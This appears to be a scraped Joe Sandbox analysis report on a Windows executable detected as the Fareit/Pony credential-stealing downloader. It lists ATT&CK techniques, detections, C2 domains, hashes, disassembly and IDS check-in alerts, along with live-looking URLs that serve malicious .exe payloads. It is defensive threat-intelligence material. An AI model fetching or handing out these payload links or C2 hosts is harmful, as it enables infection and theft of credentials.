                Source: Yara matchFile source: Process Memory Space: 8WgZHDQckx.exe PID: 6516, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure1
                Valid Accounts
                1
                Native API
                1
                Valid Accounts
                1
                Valid Accounts
                1
                Valid Accounts
                2
                OS Credential Dumping
                1
                Security Software Discovery
                Remote Services1
                Email Collection
                22
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/Job1
                DLL Side-Loading
                11
                Access Token Manipulation
                1
                Virtualization/Sandbox Evasion
                2
                Credentials in Registry
                1
                Virtualization/Sandbox Evasion
                Remote Desktop Protocol1
                Archive Collected Data
                2
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading
                11
                Access Token Manipulation
                Security Account Manager1
                Process Discovery
                SMB/Windows Admin Shares2
                Data from Local System
                3
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                Deobfuscate/Decode Files or Information
                NTDS1
                Account Discovery
                Distributed Component Object ModelInput Capture114
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
                Obfuscated Files or Information
                LSA Secrets1
                System Owner/User Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Install Root Certificate
                Cached Domain Credentials3
                File and Directory Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items22
                Software Packing
                DCSync14
                System Information Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading
                Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                8WgZHDQckx.exe95%ReversingLabsWin32.Downloader.Upatre
                8WgZHDQckx.exe100%AviraTR/PSW.Tepfer.EB.1
                8WgZHDQckx.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://6.magicalomaha.com/forum/viewtopic.php0%Avira URL Cloudsafe
                http://https://ftp://operawand.dat_Software0%Avira URL Cloudsafe
                http://6.magicalomaha.com/forum/viewtopic.phpR0%Avira URL Cloudsafe
                http://dynamotouren.de/4XM2f.exeT5C50%Avira URL Cloudsafe
                http://www.seigner-art.at/fPsx8i.exe0%Avira URL Cloudsafe
                ftp://http://https://ftp.fireFTPsites.datSeaMonkey0%Avira URL Cloudsafe
                http://6.magicalomaha.co/forum/viewtopic.phphttp://6.magicalomaha.com/forum/viewtopic.phphttp://dyna0%Avira URL Cloudsafe
                http://www.ibsensoftware.com/0%Avira URL Cloudsafe
                http://208.116.13.164/b6dK7rwV.exe0%Avira URL Cloudsafe
                http://www.aboessen24.de/WWkULwkq.exe0%Avira URL Cloudsafe
                http://dynamotouren.de/4XM2f.exe0%Avira URL Cloudsafe
                https://www.dynamotouren.com/?dynamotouren.de0%Avira URL Cloudsafe
                http://72.32.185.12/rd7nr.exe0%Avira URL Cloudsafe
                http://6.magicalomaha.co/forum/viewtopic.php0%Avira URL Cloudsafe
                http://app.bi.com.tr/fPFa.exe0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                6.magicalomaha.co
                208.91.197.44
                truetrue
                  unknown
                  www.dynamotouren.com
                  188.114.97.6
                  truetrue
                    unknown
                    dynamotouren.de
                    104.21.17.37
                    truetrue
                      unknown
                      6.magicalomaha.com
                      unknown
                      unknowntrue
                        unknown
                        app.bi.com.tr
                        unknown
                        unknowntrue
                          unknown
                          NameMaliciousAntivirus DetectionReputation
                          http://www.seigner-art.at/fPsx8i.exetrue
                          • Avira URL Cloud: safe
                          unknown
                          http://208.116.13.164/b6dK7rwV.exetrue
                          • Avira URL Cloud: safe
                          unknown
                          http://6.magicalomaha.com/forum/viewtopic.phptrue
                          • Avira URL Cloud: safe
                          unknown
                          http://www.aboessen24.de/WWkULwkq.exetrue
                          • Avira URL Cloud: safe
                          unknown
                          http://dynamotouren.de/4XM2f.exetrue
                          • Avira URL Cloud: safe
                          unknown
                          https://www.dynamotouren.com/?dynamotouren.detrue
                          • Avira URL Cloud: safe
                          unknown
                          http://72.32.185.12/rd7nr.exetrue
                          • Avira URL Cloud: safe
                          unknown
                          http://6.magicalomaha.co/forum/viewtopic.phptrue
                          • Avira URL Cloud: safe
                          unknown
                          http://app.bi.com.tr/fPFa.exetrue
                          • Avira URL Cloud: safe
                          unknown
                          NameSourceMaliciousAntivirus DetectionReputation
                          http://https://ftp://operawand.dat_Software8WgZHDQckx.exe, 00000000.00000002.2922536092.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, 8WgZHDQckx.exe, 00000000.00000002.2922726803.000000000092B000.00000004.00000020.00020000.00000000.sdmp, 8WgZHDQckx.exe, 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://ac.ecosia.org/autocomplete?q=8WgZHDQckx.exe, 00000000.00000003.1688509929.0000000000897000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            https://duckduckgo.com/chrome_newtab8WgZHDQckx.exe, 00000000.00000003.1688509929.0000000000897000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              http://dynamotouren.de/4XM2f.exeT5C58WgZHDQckx.exe, 00000000.00000002.2922627592.000000000086F000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://duckduckgo.com/ac/?q=8WgZHDQckx.exe, 00000000.00000003.1688509929.0000000000897000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://www.google.com/images/branding/product/ico/googleg_lodp.ico8WgZHDQckx.exe, 00000000.00000003.1688509929.0000000000897000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  ftp://http://https://ftp.fireFTPsites.datSeaMonkey8WgZHDQckx.exe, 00000000.00000002.2922536092.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, 8WgZHDQckx.exe, 00000000.00000002.2922726803.000000000092B000.00000004.00000020.00020000.00000000.sdmp, 8WgZHDQckx.exe, 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://6.magicalomaha.co/forum/viewtopic.phphttp://6.magicalomaha.com/forum/viewtopic.phphttp://dyna8WgZHDQckx.exe, 00000000.00000002.2922536092.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, 8WgZHDQckx.exe, 00000000.00000002.2922726803.000000000092B000.00000004.00000020.00020000.00000000.sdmp, 8WgZHDQckx.exe, 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://6.magicalomaha.com/forum/viewtopic.phpR8WgZHDQckx.exe, 00000000.00000002.2922627592.000000000082E000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.ibsensoftware.com/8WgZHDQckx.exe, 00000000.00000002.2922536092.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, 8WgZHDQckx.exe, 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmp, 8WgZHDQckx.exe, 00000000.00000002.2922726803.000000000092B000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search8WgZHDQckx.exe, 00000000.00000003.1688509929.0000000000897000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=8WgZHDQckx.exe, 00000000.00000003.1688509929.0000000000897000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=8WgZHDQckx.exe, 00000000.00000003.1688509929.0000000000897000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://www.ecosia.org/newtab/8WgZHDQckx.exe, 00000000.00000003.1688509929.0000000000897000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=8WgZHDQckx.exe, 00000000.00000003.1688509929.0000000000897000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs
                                            IPDomainCountryFlagASNASN NameMalicious
                                            188.114.97.6
                                            www.dynamotouren.comEuropean Union
                                            13335CLOUDFLARENETUStrue
                                            72.32.185.12
                                            unknownUnited States
                                            33070RMH-14UStrue
                                            104.21.17.37
                                            dynamotouren.deUnited States
                                            13335CLOUDFLARENETUStrue
                                            208.91.197.44
                                            6.magicalomaha.coVirgin Islands (BRITISH)
                                            40034CONFLUENCE-NETWORK-INCVGtrue
                                            Joe Sandbox version:41.0.0 Charoite
                                            Analysis ID:1570690
                                            Start date and time:2024-12-07 18:26:07 +01:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 4m 13s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                            Number of analysed new started processes analysed:5
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:8WgZHDQckx.exe
                                            renamed because original name is a hash value
                                            Original Sample Name:2FBFC79462B64751C339F0B0297C748F.exe
                                            Detection:MAL
                                            Classification:mal100.troj.spyw.evad.winEXE@1/0@15/4
                                            EGA Information:
                                            • Successful, ratio: 100%
                                            HCA Information:
                                            • Successful, ratio: 100%
                                            • Number of executed functions: 94
                                            • Number of non-executed functions: 41
                                            Cookbook Comments:
                                            • Found application associated with file extension: .exe
                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                            • VT rate limit hit for: 8WgZHDQckx.exe
                                            No simulations
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            188.114.97.6fUHl7rElXU.xlsxGet hashmaliciousUnknownBrowse
                                            • paste.ee/d/OARvm
                                            ibk0BQaWAo.exeGet hashmaliciousUnknownBrowse
                                            • orbitdownloader.com/
                                            ibk0BQaWAo.exeGet hashmaliciousUnknownBrowse
                                            • orbitdownloader.com/
                                            INVOICE087667899.exeGet hashmaliciousUnknownBrowse
                                            • heygirlisheeverythingyouwantedinaman.comheygirlisheeverythingyouwantedinaman.com:443
                                            ZciowjM9hN.exeGet hashmaliciousLokibotBrowse
                                            • vmopahtqdf84hfvsqepalcbcch63gdyvah.ml/BN2/fre.php
                                            104.21.17.37CS2-KC.exeGet hashmaliciousUnknownBrowse
                                              208.91.197.44SWIFT_COPY20240604.cmdGet hashmaliciousDBatLoader, FormBookBrowse
                                              • www.ng1ljmv67o.com/bh91/?hZM0=HPFh&8Fs=sprRKXXcPZhyDcVi3KQzp4EjbvIcYS55Pse02ULNwZoaMH7DGMwJIaU8WcNts2rSxaDc4FiZe8q29WnAbxSgSRWjszpYBNIX27r+Mt3U05mla1ncXqJI78E=
                                              x5SCX6JcAx3AM1x.exeGet hashmaliciousFormBookBrowse
                                              • www.jcbenterprisessite.com/vi45/
                                              Microsoftdigitalwallettechnologydevelopedrecentlyforsecuritypurposetoprotectcustomer.Doc.docGet hashmaliciousFormBook, GuLoaderBrowse
                                              • www.jcbenterprisessite.com/q58d/?2z=hBUDNno&6zk=wuE6VRPdyqNLkzjmmeXLGMiBStB9jHVp2+Bu1MnD/arrna03wDcRkY/UyLBwpRywvG3j4jg2o6j+Pt4thT8HfP2y3qZzmGCysm/8rG0=
                                              file.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                              • www.jcbenterprisessite.com/q58d/?7B6=6Twl&lt6=wuE6VRPdyqNLkzjmmaSVHI+BYJ14jnVp2+Bu1MnD/arrna03wDcR1tTyy/NzoTawu23wiXN8s7f6KNpOvT4qYNevtdVIkWGlog==
                                              cNF4Mtqlwc.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                              • www.jcbenterprisessite.com/q58d/?DP=KV9t0ll8T0wXvRc&RVa4tR48=wuE6VRPdyqNLkzjmmaSVHI+BYJ14jnVp2+Bu1MnD/arrna03wDcR1tTyy/NzoTawu23wiXN8s7f6KNpOvT4qYNevtdVIkWGlog==
                                              Invoices.xlsGet hashmaliciousFormBook, GuLoaderBrowse
                                              • www.jcbenterprisessite.com/q58d/?fdsX=SDStHjf&hhZP60XP=wuE6VRPdyqNLkzjmmeXLGMiBStB9jHVp2+Bu1MnD/arrna03wDcRkY/UyLBwpRywvG3j4jg2o6j+Pt4thT8HfP2y3qZzmGCysm/8rG0=
                                              mvJLQOpZDB.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                              • www.jcbenterprisessite.com/q58d/?iljt=vBALFVgxyLX&2NuX_dN=wuE6VRPdyqNLkzjn7qTbG7nbF8dG1xFp2+Bu1MnD/arrna03wDcR1tTyy/NzoTawu23wiXN8s7f6KNpOvT4rKba/6+9+jzOMow==
                                              Invoices.xlsGet hashmaliciousFormBook, GuLoaderBrowse
                                              • www.jcbenterprisessite.com/q58d/?h80lj=wuE6VRPdyqNLkzjmmeXLGMiBStB9jHVp2+Bu1MnD/arrna03wDcRkY/UyLBwpRywvG3j4jg2o6j+Pt4thT8HfP2y3qZzmGCysm/8rG0=&yx=kJwPMD
                                              admindemo.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                              • www.jcbenterprisessite.com/d8ts/?fDFLo07H=uwSv4j8DYTBv8vGqbtWvUWmemvh0yBIKYysdqe9NkHMtQNSN/Ip/4vwVK+hgLlUlWP1iwI6Bd2eBdRjZiUsDsPh3V0vlLyWTCZKjVeevmt59&9L6Hg=ulFd44MP04
                                              PdgJ01XGim.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                              • www.jcbenterprisessite.com/q58d/?yz=bDTX8fzH4&g4q4cn=wuE6VRPdyqNLkzjn7qTbG7nbF8dG1xFp2+Bu1MnD/arrna03wDcR1tTyy/NzoTawu23wiXN8s7f6KNpOvT4qYPaywapIkWG5vQ==
                                              No context
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC StealerBrowse
                                              • 172.67.165.166
                                              file.exeGet hashmaliciousAmadey, Credential Flusher, DarkTortilla, Discord Token Stealer, DotStealer, LummaC Stealer, StealcBrowse
                                              • 104.21.16.9
                                              file.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                              • 104.26.12.205
                                              INVOICES.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 172.67.177.134
                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                              • 104.21.16.9
                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                              • 104.21.16.9
                                              Microsoft.docGet hashmaliciousUnknownBrowse
                                              • 172.67.19.24
                                              upgrade.htaGet hashmaliciousDarkVision RatBrowse
                                              • 172.66.0.235
                                              IMPORTANT DOCUMENT.htmlGet hashmaliciousUnknownBrowse
                                              • 104.17.25.14
                                              IMPORTANT DOCUMENT.htmlGet hashmaliciousUnknownBrowse
                                              • 104.17.25.14
                                              CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC StealerBrowse
                                              • 172.67.165.166
                                              file.exeGet hashmaliciousAmadey, Credential Flusher, DarkTortilla, Discord Token Stealer, DotStealer, LummaC Stealer, StealcBrowse
                                              • 104.21.16.9
                                              file.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                              • 104.26.12.205
                                              INVOICES.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 172.67.177.134
                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                              • 104.21.16.9
                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                              • 104.21.16.9
                                              Microsoft.docGet hashmaliciousUnknownBrowse
                                              • 172.67.19.24
                                              upgrade.htaGet hashmaliciousDarkVision RatBrowse
                                              • 172.66.0.235
                                              IMPORTANT DOCUMENT.htmlGet hashmaliciousUnknownBrowse
                                              • 104.17.25.14
                                              IMPORTANT DOCUMENT.htmlGet hashmaliciousUnknownBrowse
                                              • 104.17.25.14
                                              RMH-14USjew.sh4.elfGet hashmaliciousUnknownBrowse
                                              • 166.79.105.235
                                              sora.mpsl.elfGet hashmaliciousMiraiBrowse
                                              • 72.41.62.234
                                              sora.m68k.elfGet hashmaliciousMiraiBrowse
                                              • 72.3.162.84
                                              sora.m68k.elfGet hashmaliciousMiraiBrowse
                                              • 72.41.62.236
                                              la.bot.mipsel.elfGet hashmaliciousMiraiBrowse
                                              • 72.40.38.11
                                              loligang.spc.elfGet hashmaliciousMiraiBrowse
                                              • 104.130.154.4
                                              loligang.sh4.elfGet hashmaliciousMiraiBrowse
                                              • 166.78.163.205
                                              sh4.elfGet hashmaliciousMirai, MoobotBrowse
                                              • 166.79.176.16
                                              loligang.arm7.elfGet hashmaliciousMiraiBrowse
                                              • 72.41.44.208
                                              nabarm5.elfGet hashmaliciousUnknownBrowse
                                              • 23.253.114.144
                                              No context
                                              No context
                                              No created / dropped files found
                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Entropy (8bit):5.929206239273409
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              • DOS Executable Generic (2002/1) 0.02%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:8WgZHDQckx.exe
                                              File size:381'552 bytes
                                              MD5:2fbfc79462b64751c339f0b0297c748f
                                              SHA1:3c07b52af2661e02e4db7dc978a83db0ba7c570f
                                              SHA256:2b7658a9c50bf8ee549193723e56b6500d4a193a5eb8e10871c67956d5d4e835
                                              SHA512:dbc3b7d8a7419feacf98481f542991edfcfe67d48a31244aff3818d28770842c2b7fd62a6d174e0132946ab73e60c00213a3c116090559e75512f38047b7a827
                                              SSDEEP:3072:eps58pvoY9pm4arHiETYPTP3vfdHldhwE3vfdHldhwVOpvoY9FpvoY9jmJm4arq3:UW8Zr9U4nE49Zr9FZr9q04BnEASEg
                                              TLSH:D1841956B254298AF5EE0A7098A6C610D667FE191838807CA1BBF33D57732465F33B0F
                                              File Content Preview:MZ......................@...............................................!..L."This program cannot be run in DOS mode....$........./.B.A.B.A.B.A...N.@.A...!.C.A.....U.A.B.@...A.....^.A.....C.A.....C.A.RichB.A.........PE..L....2.=.................@.........
                                              Icon Hash:1b9c988b9bab879b
                                              Entrypoint:0x4024f0
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                              DLL Characteristics:
                                              Time Stamp:0x3D8732AF [Tue Sep 17 13:48:31 2002 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:547d55964e9333c3057788d5c4e8169f
                                              Instruction
                                              xor edx, edx
                                              push dword ptr [esp+10h]
                                              call 00007FD7888C75FFh
                                              pop ecx
                                              jmp dword ptr [004150C0h]
                                              int3
                                              int3
                                              int3
                                              mov ecx, 00402513h
                                              add dword ptr [004150C0h], ecx
                                              retn 0004h
                                              push ebp
                                              mov ebp, esp
                                              sub esp, 14h
                                              mov dword ptr [ebp-0Ch], DCF9755Ch
                                              mov dword ptr [ebp-14h], 00000000h
                                              mov dword ptr [ebp-08h], 00000000h
                                              call 00007FD7888C74F7h
                                              call 00007FD7888C7329h
                                              mov dword ptr [ebp-10h], eax
                                              cmp eax, 00000000h
                                              je 00007FD7888C75F4h
                                              jmp 00007FD7888C762Fh
                                              push dword ptr [ebp-14h]
                                              push dword ptr [ebp-14h]
                                              xor dword ptr [ebp-04h], 9D44E85Bh
                                              push dword ptr [ebp-14h]
                                              push dword ptr [ebp-14h]
                                              lea edx, dword ptr [ebp+08h]
                                              sub edx, 10h
                                              push edx
                                              call 00007FD7888C6F14h
                                              add esp, 14h
                                              xor dword ptr [ebp-04h], CD379C60h
                                              cmp dword ptr [ebp-0Ch], DCF9755Ch
                                              je 00007FD7888C75F2h
                                              or byte ptr [ebp-04h], FFFFFFA6h
                                              mov byte ptr [00415400h], 00000001h
                                              mov esp, ebp
                                              pop ebp
                                              ret
                                              mov esp, ebp
                                              pop ebp
                                              ret
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              push ebp
                                              mov ebp, esp
                                              sub esp, 00000088h
                                              mov dword ptr [ebp-60h], 00000004h
                                              mov dword ptr [ebp-10h], 00000000h
                                              mov dword ptr [ebp-0Ch], 00000200h
                                              mov dword ptr [ebp-6Ch], 9F74708Ch
                                              mov dword ptr [ebp-5Ch], 00000000h
                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x140d00x3c.text
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x660000xd214.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x11000x1c.text
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x10000xf4.text
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x10000x136300x14000d6c60e57d664ab578edc0f8c5bf49999False0.760107421875data6.970578891686763IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              .data0x150000x504000x100085fd98acc87085326611bb7bc32bdd99False0.034912109375data0.3703270049920998IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .rsrc0x660000xd2140xe00050509186ad1a51c03bebb2b7840a78f9False0.12958635602678573data4.318848328541793IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                              RT_BITMAP0x663700x1d0Device independent bitmap graphic, 48 x 15 x 4, image size 360EnglishUnited States0.5387931034482759
                                              RT_BITMAP0x665400x3560Device independent bitmap graphic, 118 x 226 x 4, image size 0EnglishUnited States0.10187353629976581
                                              RT_BITMAP0x69aa00x3560Device independent bitmap graphic, 118 x 226 x 4, image size 0EnglishUnited States0.10889929742388758
                                              RT_ICON0x6d0000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.2008298755186722
                                              RT_ICON0x6f5a80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.2008298755186722
                                              RT_DIALOG0x71b500x23adataEnglishUnited States0.5017543859649123
                                              RT_DIALOG0x71d8c0x1f4dataEnglishUnited States0.55
                                              RT_DIALOG0x71f800x114dataEnglishUnited States0.6884057971014492
                                              RT_STRING0x720940x44cdataEnglishUnited States0.3972727272727273
                                              RT_STRING0x724e00x356dataEnglishUnited States0.4203747072599532
                                              RT_STRING0x728380x548dataEnglishUnited States0.34763313609467456
                                              RT_STRING0x72d800x104dataEnglishUnited States0.5461538461538461
                                              RT_STRING0x72e840x52dataEnglishUnited States0.6341463414634146
                                              RT_GROUP_ICON0x72ed80x22dataEnglishUnited States1.0
                                              RT_VERSION0x72efc0x318dataEnglishUnited States0.43434343434343436
                                              DLLImport
                                              KERNEL32.dllLockFile, SetStdHandle, GetLocaleInfoW, FlushFileBuffers, GetSystemInfo, VirtualProtect, LCMapStringW, LCMapStringA, VirtualQuery, RtlUnwind, HeapReAlloc, GetOEMCP, GetACP, LoadLibraryA, GetStringTypeW, GetStringTypeA, IsValidCodePage, IsValidLocale, EnumSystemLocalesA, GetLocaleInfoA, GetUserDefaultLCID, Sleep, GetCPInfo, HeapCreate, HeapDestroy, GetStartupInfoA, GetFileType, SetHandleCount, GetEnvironmentStringsW, WideCharToMultiByte, FreeEnvironmentStringsW, GetEnvironmentStrings, FreeEnvironmentStringsA, GetModuleFileNameA, WriteFile, MultiByteToWideChar, GetLastError, GetModuleHandleA, GetProcAddress, ExitProcess, GetProcessHeap, HeapAlloc, GetVersionExA, HeapFree, GetCommandLineA, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, GetSystemTimeAsFileTime, GetCurrentProcessId, GetCurrentThreadId, GetTickCount, QueryPerformanceCounter, FormatMessageA, LocalFree, GetDiskFreeSpaceA, lstrlenA
                                              msvcrt.dllputs
                                              Language of compilation systemCountry where language is spokenMap
                                              EnglishUnited States
                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                              2024-12-07T18:27:00.133063+01002014234ET MALWARE Fareit/Pony Downloader Checkin 31192.168.2.449881188.114.97.6443TCP
                                              2024-12-07T18:27:00.133063+01002014562ET MALWARE Pony Downloader HTTP Library MSIE 5 Win981192.168.2.449881188.114.97.6443TCP
                                              2024-12-07T18:27:00.133063+01002014234ET MALWARE Fareit/Pony Downloader Checkin 31192.168.2.44988372.32.185.1280TCP
                                              2024-12-07T18:27:00.133063+01002014562ET MALWARE Pony Downloader HTTP Library MSIE 5 Win981192.168.2.44988372.32.185.1280TCP
                                              2024-12-07T18:27:01.150098+01002014411ET MALWARE Fareit/Pony Downloader Checkin 21192.168.2.449730208.91.197.4480TCP
                                              2024-12-07T18:27:01.150098+01002014562ET MALWARE Pony Downloader HTTP Library MSIE 5 Win981192.168.2.449730208.91.197.4480TCP
                                              2024-12-07T18:27:01.150098+01002016550ET MALWARE Win32/Fareit Checkin 21192.168.2.449730208.91.197.4480TCP
                                              2024-12-07T18:27:02.190465+01002013934ET MALWARE Win32.Fareit.A/Pony Downloader Checkin1192.168.2.449730208.91.197.4480TCP
                                              2024-12-07T18:27:07.438897+01002014411ET MALWARE Fareit/Pony Downloader Checkin 21192.168.2.449731208.91.197.4480TCP
                                              2024-12-07T18:27:07.438897+01002014562ET MALWARE Pony Downloader HTTP Library MSIE 5 Win981192.168.2.449731208.91.197.4480TCP
                                              2024-12-07T18:27:07.438897+01002016550ET MALWARE Win32/Fareit Checkin 21192.168.2.449731208.91.197.4480TCP
                                              2024-12-07T18:27:08.478817+01002013934ET MALWARE Win32.Fareit.A/Pony Downloader Checkin1192.168.2.449731208.91.197.4480TCP
                                              2024-12-07T18:27:13.735074+01002014411ET MALWARE Fareit/Pony Downloader Checkin 21192.168.2.449732208.91.197.4480TCP
                                              2024-12-07T18:27:13.735074+01002014562ET MALWARE Pony Downloader HTTP Library MSIE 5 Win981192.168.2.449732208.91.197.4480TCP
                                              2024-12-07T18:27:13.735074+01002016550ET MALWARE Win32/Fareit Checkin 21192.168.2.449732208.91.197.4480TCP
                                              2024-12-07T18:27:14.803645+01002013934ET MALWARE Win32.Fareit.A/Pony Downloader Checkin1192.168.2.449732208.91.197.4480TCP
                                              2024-12-07T18:27:20.047745+01002014411ET MALWARE Fareit/Pony Downloader Checkin 21192.168.2.449736208.91.197.4480TCP
                                              2024-12-07T18:27:20.047745+01002014562ET MALWARE Pony Downloader HTTP Library MSIE 5 Win981192.168.2.449736208.91.197.4480TCP
